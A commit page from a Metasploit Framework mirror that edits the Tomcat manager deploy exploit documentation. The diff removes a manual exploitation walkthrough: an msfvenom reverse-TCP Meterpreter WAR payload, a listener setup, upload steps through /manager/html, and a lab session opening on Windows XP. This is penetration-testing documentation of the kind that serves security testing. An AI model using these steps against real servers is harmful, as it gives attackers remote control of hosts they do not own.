infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

removed gui stuff since it should be in tomcat_mgr_upload

bug/bundler_fix
h00die 2017-01-15 19:11:58 -05:00
parent b61ca669cf
commit 32271318e5
1 changed files with 7 additions and 72 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
View File

@ -3,7 +3,10 @@ This documentation is slightly different from the standard module documentation
This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation. This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
# Cleanup # Cleanup
It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done [manually](#manual-cleanup). It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This can be done [manually](#manual-cleanup).
# tomcat_mgr_upload
This module is VERY similar to `exploit/multi/http/tomcat_mgr_upload`, the main difference is this uses a `PUT` HTTP request, instead of going through a `POST` HTTP request through the GUI.
## Windows (xp sp2) ## Windows (xp sp2)
### Tomcat 6 (6.0.48) ### Tomcat 6 (6.0.48)
@ -77,8 +80,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe) 2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe)
The install was default, other than adding a user during install. No other options were changed. The install was default, other than adding a user during install. No other options were changed.
Of note, while the user was given `manager-gui` permissions, they didn't actually define that role. Of note, the user was given `manager-gui` permissions by default.
So the `/manager/html` page was visible, but deploying from there wasn't possible.
#### text/script Interface Exploitation #### text/script Interface Exploitation
@ -132,9 +134,6 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
Meterpreter : java/windows Meterpreter : java/windows
``` ```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
### Tomcat 8 (8.0.39) ### Tomcat 8 (8.0.39)
Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation. Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
@ -144,8 +143,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe) 2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe)
The install was default, other than adding a user during install. No other options were changed. The install was default, other than adding a user during install. No other options were changed.
Of note, while the user was given `manager-gui` permissions, they didn't actually define that role. Of note, the user was given `manager-gui` permissions by default.
So the `/manager/html` page was visible, but deploying from there wasn't possible.
#### text/script Interface Exploitation #### text/script Interface Exploitation
@ -195,9 +193,6 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
Meterpreter : java/windows Meterpreter : java/windows
``` ```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
## Linux ## Linux
### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit ### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
@ -317,9 +312,6 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
Meterpreter : x86/linux Meterpreter : x86/linux
``` ```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit ### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation. Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
@ -381,63 +373,6 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
Meterpreter : x86/linux Meterpreter : x86/linux
``` ```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
# Manual Exploitation
## Create payload
This was performed on Windows XP with the following permissions as the user that was used to login:
* Tomcat 6.0.48: `manager`
* Tomcat 7.0.73: `manager-gui`
* Tomcat 8.0.39: `manager-gui`
```
/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
Payload size: 6072 bytes
Final size of war file: 6072 bytes
Saved as: meterp.war
```
## Setup Handler
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(handler) > set lport 7777
lport => 7777
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.2.117:7777
[*] Starting the payload handler...
```
## Deploy
1. With a web browser, browse to `http://<ip>:<port>/manager/html`
2. Enter credentials (no default)
3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed.
5. Either click the link for `/meterp` or browse to `http://<ip>:<port>/meterp/`
## Callback
After browsing to that page, code execution will happen, and your callback will hit.
```
[*] Starting the payload handler...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
## Manual Cleanup ## Manual Cleanup
This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat. Manual cleanup can be done by logging into the `/manager` website. From there, click `Undeploy` within the `Application` list to remove the malicious app from Tomcat.